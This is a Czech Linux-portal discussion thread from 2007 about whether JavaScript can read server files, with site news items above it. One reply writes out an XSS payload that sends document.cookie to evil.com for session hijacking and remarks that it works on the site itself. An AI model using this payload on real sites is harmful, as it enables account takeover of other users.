Javascript + přístup k souborům (diskuse)

AbcLinuxu hledá autory!

Inzerujte na AbcPráce.cz od 950 Kč

Rozšířené hledání

napište » Zprávičky

inzerujte » Pracovní nabídky

Vyjádřeni Software Freedom Conservancy (SFC) k porušování licence AGPLv3 společností Bambu Lab

dnes 00:22 | Komunita

Vyjádřeni Software Freedom Conservancy (SFC) k porušování licence AGPLv3 společností Bambu Lab v jejich softwaru Bambu Studio pro 3D tisk. Bambu Studio vychází z PrusaSliceru. Ten zase z Slic3ru. Spuštěn byl projekt baltobu, který kombinuje několik strategií pro řešení problému. SFC zastřeší vývoj svobodné náhrady proprietární knihovny libbambu_networking pomocí reverzního inženýrství a reimplementace, forku OrcaSliceru pro Bambu Lab tiskárny od Paweła Jarczaka a forku celého Bambu Studia pod názvem Viscose.

Ladislav Hagara | Komentářů: 0

GNOME Commander 2.0.0

včera 22:44 | Nová verze

Správce souborů GNOME Commander (Wikipedie) byl přepsán do Rustu a vydán v nové verzi 2.0.0.

Ladislav Hagara | Komentářů: 0

Sway 1.12

včera 19:44 | Nová verze

Sway (Wikipedie), dlaždicový (tiling) správce oken pro Wayland kompatibilní s i3, byl vydán ve verzi 1.12. Do vývoje se zapojilo 50 vývojářů. Přehled novinek na GitHubu. Sway 1.12 závisí na wlroots 0.20.0.

Ladislav Hagara | Komentářů: 0

Papež v encyklice o AI varoval před dezinformacemi a dopady umělé inteligence

včera 16:33 | IT novinky

Papež Lev XIV. ve své první encyklice Magnifica Humanitas (Skvělé lidství), která se věnuje umělé inteligenci (AI), varoval před dezinformacemi, které AI manipulací s obsahem vytváří. Moc mají podle něj sociální sítě ovládané hrstkou soukromníků. Upozornil také roli digitálních platforem v obchodování s lidmi, které podle něj musí být uznáno jako současná forma otroctví. Papež se také poprvé omluvil za roli, kterou Vatikán sehrál při legitimizaci otroctví, a za to, že jej po staletí neodsoudil.

Ladislav Hagara | Komentářů: 0

Český telekomunikační úřad zveřejnil Výroční zprávu za rok 2025

včera 16:11 | IT novinky

Český telekomunikační úřad zveřejnil Výroční zprávu za rok 2025 (pdf), která shrnuje jeho hlavní aktivity v oblasti regulace elektronických komunikací, poštovních služeb, digitálních služeb a přípravy na dohled nad umělou inteligencí. Součástí zprávy jsou také data o vývoji trhu, včetně pokračujícího růstu spotřeby mobilních dat a rozšiřování sítí nové generace. Celkový objem přenesených mobilních dat dosáhl v roce 2025 přibližně

… více »

Ladislav Hagara | Komentářů: 0

CZ.NIC vydal nové verze routovacího daemona BIRD

včera 16:00 | Nová verze

Tým sdružení CZ.NIC vyvíjející routovacího daemona BIRD oznámil vydání nových verzí 3.3.0 a 2.19.0. Ty přinášejí podporu pro EVPN/VXLAN a automatizaci BGP na základě router advertisementů. Více informací je k dispozici v archivu uživatelského mailing-listu.

VSladek | Komentářů: 0

LightZone 5.0.0

24.5. 04:33 | Nová verze

Open source software pro úpravu digitálních fotografií LightZone (Wikipedie) byl vydán v nové verzi 5.0.0. LightZone je dnes k dispozici pod licencí BSD. Původně se jednalo o proprietární software vyvíjený společností Light Crafts. Ta v prosinci 2012 souhlasila s uvolněním zdrojových kódů jako open source [Wayback Machine].

Ladislav Hagara | Komentářů: 0

PuTTY 0.84

23.5. 17:22 | Nová verze

Byla vydána verze 0.84 telnet a ssh klienta PuTTY (Wikipedie). Podrobnosti v přehledu nových vlastností a oprav chyb a Change Logu.

Ladislav Hagara | Komentářů: 2

Microsoft představil Azure Linux 4.0 a Azure Container Linux

22.5. 19:44 | IT novinky

Microsoft představil Azure Linux 4.0 a Azure Container Linux. Na konferenci Open Source Summit North America 2026 organizované konsorciem Linux Foundation a sponzorované také Microsoftem. Azure Linux 4.0 vychází z Fedora Linuxu. Azure Container Linux je založen na projektu Flatcar. Azure Linux (GitHub, Wikipedie) byl původně znám jako CBL-Mariner.

Ladislav Hagara | Komentářů: 0

Raspberry Pi Official Magazine 165

22.5. 12:22 | Zajímavý článek

Nové číslo časopisu Raspberry Pi zdarma ke čtení: Raspberry Pi Official Magazine 165 (pdf).

Ladislav Hagara | Komentářů: 0

Centrum | Napsat | Starší

navrhněte » Anketa

Komentářů: 30, poslední 3.4. 20:20

Rozcestník

AbcLinuxu

HDmag.cz

AbcLinuxu:/ Blogy / blog / . / Javascript + přístup k souborům (diskuse)

Štítky: AbcLinuxu, FTP, HTML, IDE, Internet, KDE, PHP, práva, programování, web

Nástroje: Začni sledovat (1) ?

Vložit další komentář

28.12.2007 01:40 progdan | skóre: 34 | blog: Archař | Teplice/Brno
Rozbalit Rozbalit vše Re: Javascript + přístup k souborům

Odpovědět | Sbalit | Link | Blokovat | Admin

Nejsem si zcela jisty, ale k souborum myslim JavaScript do urcite miry pristupovat dokaze. Cim sem si vsak jisty, nedokaze pristoupit k souboru php. Tedy dokaze, ale ziska pouze koncovy (X)HTML (nebo jiny) vystup, nikdy vsak samotny kod souboru - to nelze zadnym zpusobem ani jazykem (krome prolomeni hesla na FTP a stazeni souboru ale to uz je neco trochu jinyho)

Collecting data is only the first step toward wisdom, but sharing data is the first step toward the community.

28.12.2007 01:43 unknown_ | skóre: 30 | blog: blog
Rozbalit Rozbalit vše Re: Javascript + přístup k souborům

Dík, myslel sem, že pokud k tomu dokáže přistoupit, tak jako k plain textu, protože html výstup už mám :-)

28.12.2007 01:45 unknown_ | skóre: 30 | blog: blog
Rozbalit Rozbalit vše Re: Javascript + přístup k souborům

K tomu přístupu k .php, mělo by to jít pomocí php funkce readfile()?

28.12.2007 01:54 Josef Kufner | skóre: 70
Rozbalit Rozbalit vše Re: Javascript + přístup k souborům

Odpovědět | Sbalit | Link | Blokovat | Admin

K souborům by jsi se neměl dostat ani na straně klienta a už vůbec ne na straně serveru. Pokud se ti to povede, tak to nahlaš jako obrovskou bezpečnostní díru.

Hello world ! Segmentation fault (core dumped)

28.12.2007 01:59 unknown_ | skóre: 30 | blog: blog
Rozbalit Rozbalit vše Re: Javascript + přístup k souborům

To se mi nepovede už proto, že se tím asi dál zabývat nebudu, jen sem se trochu nudil, takže je mi to docela jedno. Jenom škoda, mohl z toho být poprask. Ale na to XSS je náchylnej snad každej druhej server :-/

28.12.2007 01:59 Přemek Vyhnal | skóre: 24 | blog: Toto není blog! | Dobřichovice
Rozbalit Rozbalit vše Re: Javascript + přístup k souborům

Odpovědět | Sbalit | Link | Blokovat | Admin

Můžu pomocí javascriptu zobrazit index.php?

Javascript běží u klienta - v prohlížeči.

Ale kdyz ho dokazes vlozit do nejaky stranky tak aby se zobrazil i jinym navstevnikum tak muzes napriklad ukrast prihlasovaci susenku.

<script>
location.href="http://evil.com/sendtomail.php?cookie="+document.cookie; 
</script>

Tohle presmeruje navstevnika na utocnikuv server na script kterej parametry co dostane pres GET posle na mail (treba). Utocnik si pak to co mu prijde nastavi jako svoji susenku a rychle nez se obet odhlasi se pujde s tou susenkou podivat na ten web a bude prihlasenej jako uzivatel kterymu to ukrad.

..ale je to lamarna .)

BTW jde to i na abclinuxu

NO RAPTORS!

28.12.2007 10:37 Ritchie | skóre: 27 | blog: Ritchie's | Berlin
Rozbalit Rozbalit vše Re: Javascript + přístup k souborům

Odpovědět | Sbalit | Link | Blokovat | Admin

Samozřejmě, že lze pomocí javascriptu otevřít soubor, stačí vytvořit objekt File. Ovšem ne všechny implementace javascriptu povolují vytvořit takový objekt, například implementace javascriptu v prohlížečích z pochopitelných důvodů soubory otevírat neumožňují.

Nemusím snad psát, že abyste mohl otevřít soubor, musíte mít přístup k souborovému systému, kde se soubor nachází. Pokud máte představu, že HTTP zpřístupňuje souborový systém serveru, doporučuji si přečíst alespoň úvod k tomuto protokolu. Zabralo by vám to jistě méně času, než napsání nesmyslného příspěvku do blogu.

28.12.2007 11:51 Filip Jirsák | skóre: 67 | blog: Fa & Bi
Rozbalit Rozbalit vše Re: Javascript + přístup k souborům

Odpovědět | Sbalit | Link | Blokovat | Admin

Btw neznáte nějaký přehled javascriptových funkcí? Nerad bych swe zdržoval věcma jako že a=1, b=2, a+b=3; to je ve všech jazycích stejný. Potřeboval bych nějaký přehled všech funkcí javascriptu. Nevíte o něčem takovým? … Co udělat na webu, hacknutelného přes XSS, když nemůžu nahradit index?

Nechat ten hacknutelný web na pokoji, a jít studovat základy. Základy programování, základy HTML a souvisejících věcí, co je to JavaScript a co jsou různé jeho implementace. Pak taky můžete trénovat vyhledávání Googlem (to abyste se nemusel shánět po manuálech k JavaScriptu, když vám jich Google najde několik stránek). Až to všechno budete mít nastudované, zjistěte si taky, co je to XSS – doufám, že po prostudování všeho předešlého už nebudete zklamaný z toho, že XSS není to, co hledáte.

28.12.2007 22:34 Mazarik
Rozbalit Rozbalit vše Re: Javascript + přístup k souborům

Odpovědět | Sbalit | Link | Blokovat | Admin

Pokial Javascript chcete pouzit ako jazyk na serveri(nieco v style php), tak sa samozrejme subory otvarat daju. Pokial chcete pracovat so subormi na html stranke na strane klienta, tak to ide imho maximalne pomocou html input type="file" tusim, kde sa Vam otvori file dialog. Na ine operacie so subormi na strane klienta potrebujete vacsie prava, ktore musi povolit uzivatel. Aj ked som presne nepochopil o co Vam vlastne ide, tak pravdepodobne chcete presmerovat stranku pomocou javascriptu na inu stranku. Tak to sa robi napriklad document.location.href="_adresa_"

28.12.2007 22:36 Mazarik
Rozbalit Rozbalit vše Re: Javascript + přístup k souborům

Este celkom dobra a dokumentacia Javascriptu, ktora funguje vo vsetkych prehliadacoch, je na stranke http://devguru.com/technologies/javascript/home.asp

Založit nové vlákno • Nahoru

Tiskni Sdílej: